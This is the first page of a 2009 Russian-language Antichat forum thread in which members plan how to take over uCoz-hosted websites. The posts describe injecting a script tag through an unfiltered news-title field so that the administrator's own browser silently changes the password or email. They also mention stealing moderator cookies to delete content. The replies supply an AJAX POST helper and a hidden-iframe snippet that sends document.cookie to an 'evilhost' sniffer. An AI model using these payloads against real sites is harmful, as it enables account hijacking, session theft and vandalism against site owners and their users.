Форум АНТИЧАТ
Страница 1 из 6 1 2 3 4 5 > Последняя »
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Найден способ взлома UcoZ! (https://forum.antichat.xyz/showthread.php?t=100212)

Artemik 08.01.2009 19:15
Найден способ взлома UcoZ!
 
Все мы знаем, что UcoZ неприступный и уже все головы сломали (ломают) как его взломать.
Cookie админа украсть не проблема, даже если на форуме выключены HTML теги.

Но! По умолчанию в UcoZ стоит привязка IP к админу. Тоесть куки то мы украли, но войти не сможем. А админ не станет эту привязку просто так отключать.
Но привязка IP модератора по умолачнию выключена. ;) так что вы можете украсть куки модератора, войти под его логином, и удалить все темы, новости, и.т. д.
По идее то нам зачастую это и нужно - насолить бедной жертве =)))
Но нам это неподходит. Двигаемся дальше.

А что если админ сам себе, не подозревая того, сменит свой пароль на нужный нам? =)

Именно так мы и поступим.

Дело в том, что в форме добавления новостей не фильтруется поле "Название материала". :cool:

А что мы можем с этим сделать? Можно здесь вставить скрипт перенаправки на сниффер, но нам то куки админа ненужны.
А вот что! =)

Мы внедрим файл в заголовок нашей "злой" новости! :)

Создаем любой файлик. И в него вписываем код.
В этом коде будет содержаться POST запрос с помощью ActiveX.
Код мы вписали.
Теперь заливаем его на сайте который хотим взломать.
Это можно сделать например так:
Зайти на форум. В форме написания сообщения прикрпеить наш файл( там есть кнопочка "Обзор", вот через нее надо прикреплять) Сообщение напишите произвольное.
Когда нажмете отправить, увидите свое сообщение, а чуть нижу будет написано " Прикрепления: "название файла", его размер".
Наведите курсор на название этого файлика и увидите в нижнем левом углу ссылку на этот файл.

Незнаю как у вас, а у меня, в Фаерфоксе, можно сделать так: Клик правой кнопкой по ссылке на файл, выбираю там пункт "Копировать ссылку". И все, ссылку у меня в буфере обмена.
Ну а у кого неть такой функции, придется набирать ссылку ручками =)

Теперь идем создавать новость.

Новость напишите произвольную.
Это не имеет значения, нас интересует строка "Название материала".

Туда вписываем

<script src="../путь до файла"></script>

Например у меня так:

<script src="../_fr/0/0962166.img"></script>


Видите у меня полсе ...src=" стоят 2 точки?
Это не обозначает "адрес сайта который надо взломать"! Так UcoZ воспринимает адрес самого сайта (главной страницы).

И вуаля! пароль изменен нам на нужный :cool:


Вот только пожалуйста не кричите на меня, но я незнаю кода, для POST запроса. Я с ним не в ладах))

Если кто может сделать этот код, то пишите тут!
Собственно для этого я и сделал тему)

Вообщем нам надо только сделать этот код, и вставить его в файлик, который потом заливать будем на сайт! И Все! Считай неприступный UcoZ взломан :o

AkyHa_MaTaTa 08.01.2009 19:37
я конечно не знаком с системой ucoz, но вроде везде где идет смена пароля требуеться вести старый для подтвержения.
И в src можно указывать любой валидный url, не обязательно атачить на это же сайт js файл, легчше на свой сайт залить и в src его указать.
Вот самый простинкий ajax запрос:
PHP код:

url="admin.php";// адрес куда будем передовать

function sendRequest(params)// в params  переменые передоваемы в пост запросе
{
if(params!==""){
req=initXMLHTTPRequest();
if (req)
{
req.onreadystatechange=somedo;
req.open("POST",url,true);
req.setRequestHeader("Content-Type""application/x-www-form-urlencoded");
req.send(params);}
}
}

function initXMLHTTPRequest()
{
var xRequest=null;
if (window.XMLHttpRequest){
xRequest=new XMLHttpRequest();
} else if (window.ActiveXObject){
xRequest=new ActiveXObject
("Microsoft.XMLHTTP");
}
return xRequest;
}

function somedo() 
{  



Artemik 08.01.2009 19:57
А ты можешь его подогнать под конкретно Укоз?

AkyHa_MaTaTa 08.01.2009 20:00
Цитата:
Сообщение от Artemik
А ты можешь его подогнать под конкретно Укоз?
Зарегай мне акк на укозе, или дай какойто, я хз че там передаеться.

iddqd 08.01.2009 20:00
Лучше сделать через обычный csrf- автосабмит формы, потому как XMLHTTPRequest не отправит запрос на сторонний домен(если этот файл не приаттачить)

AkyHa_MaTaTa 08.01.2009 20:08
Цитата:
Сообщение от iddqd
Лучше сделать через обычный csrf- автосабмит формы, потому как XMLHTTPRequest не отправит запрос на сторонний домен(если этот файл не приаттачить)
мм, если он создаст на том же сайте <script type="text/javascript" src="http://любой_сайт/path/script.js"></script> и регьюст будет идти на тот же доменик то все отправиться(а имено это описал ТС)

[Raz0r] 08.01.2009 20:14
Цитата:
В этом коде будет содержаться POST запрос с помощью ActiveX.
Код мы вписали.
ТС, ActiveX работает только в IE.
Цитата:
И в src можно указывать любой валидный url, не обязательно атачить на это же сайт js файл, легчше на свой сайт залить и в src его указать.
Same Origin Policy не позволяет делать AJAX-запросы на удаленные сайты, поэтому в <script src=""> необходимо указывать скрипт, находящийся в пределах того же хоста.

Универсальный способ отправить POST-запрос с помощью html и js:
PHP код:
<iframe width=0 height=0 id=lol name=lol></iframe>
// создаем невидимый iframe для того, чтобы отправка формы не вызывала перезагрузку страницы
<form name=myform method=post target=lol>
// создаем форму, в которой target - это наш iframe
<input type=hidden name=c>
// здесь любые данные, в данном случае cookie
</form>
<script>
// теперь очередь js
document.myform.action='http://evilhost/snif.php';
// устанваливаем action на наш сервер
document.myform.c.value=document.cookie;
// записываем в hidden-поле данные cookie пользователя
document.myform.submit();
// отправляем форму
</script
Цитата:
мм, если он создаст на том же сайте <script type="text/javascript" src="http://любой_сайт/path/script.js"></script> и регьюст будет идти на тот же доменик то все отправиться(а имено это описал ТС)
так работать не будет!

dr.Pilulkin 08.01.2009 20:29
А с помощью Flash можно отравлять запросы?

Artemik 08.01.2009 20:37
Razor нам ненужны Куки. Нам надо, чтобы через этот пост запрос админ переходил в свой профиль, и менял свой пароль. Я точно непомню, но вроде переменная, в которой вводится праоль там называется passw. Но, я сейчас придумал другой варинат. Если неполучится изменить переменную пассв, то можно поменять не пароль а e-mail на свой. Потом сказать что ты типо забыл пароль и тебе на e-mail придет письмо. =)

Ну зарегайте любой сайт на Укозе, это быстро же и покапайтесь =)

ucoz.ru

Но, я вроде уже придумал код, но сегодня выложить немогу, ждите до завтра )))))

AkyHa_MaTaTa 08.01.2009 20:39
Цитата:
Сообщение от [Raz0r]

Same Origin Policy не позволяет делать AJAX-запросы на удаленные сайты, поэтому в <script src=""> необходимо указывать скрипт, находящийся в пределах того же хоста.
так работать не будет![/url]
БРЕД, ТАК РАБОТАТЬ БУДЕТ,И ЭТО МНОЮ УЖЕ ПРОВЕРЯЛОСЬ НЕ ОДНОКРАТНО!!! ДРУГОЕ ДЕЛО ЕСЛИ ВЫ ИСПОЛЬЗУЕТЕ В САМОМ XMLHTTPRequest запрос к другому домену то да, этого сделать не получиться. ЕСЛИ НЕ ВЕРИТЕ Я МОГУ УСТРОИТЬ МАЛЕНЬКУЮ ДЕМОНТСРАЦИЮ ЭТОГО
Вот почитайте
http://javascript.ru/ajax/cross-domain-scripting
Цитата:
Наиболее известный транспорт, позволяет такие запросы - это SCRIPT, т.к <script src="..."> может подгружать яваскрипт с любого домена.
Цитата:
Сообщение от [Raz0r]
ТС, ActiveX работает только в IE.
мм, если вы подразумеваете что XMLHTTPRequest в старых браузерах от ие был не native object а вызывался через ActiveX, то да, но если вы посмотрите на код, то там идет проверка на это, в остальных браузерах с подержкой XMLHTTPRequest он идет как native object и в новых версиях ИЕ.


Время: 07:07
Страница 1 из 6 1 2 3 4 5 > Последняя »
Показывать 40 сообщений этой темы на одной странице